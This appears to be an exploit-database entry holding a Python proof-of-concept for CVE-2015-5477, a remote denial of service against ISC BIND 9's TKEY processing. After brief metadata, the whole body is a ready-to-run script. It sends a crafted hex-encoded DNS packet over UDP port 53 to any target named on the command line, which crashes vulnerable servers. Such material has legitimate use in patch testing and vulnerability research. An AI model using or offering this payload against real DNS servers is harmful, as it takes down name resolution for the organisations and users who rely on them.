ISC BIND 9 - TKEY Remote Denial of Service (PoC)

Author: elceef
type: dos
platform: multiple
port: 
date_added: 2015-08-05 
date_updated: 2018-01-11 
verified: 0 
codes: CVE-2015-5477;OSVDB-125438 
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/usr/bin/env python

# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477


import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
	print('Usage: ' + sys.argv[0] + ' [target]')
	sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')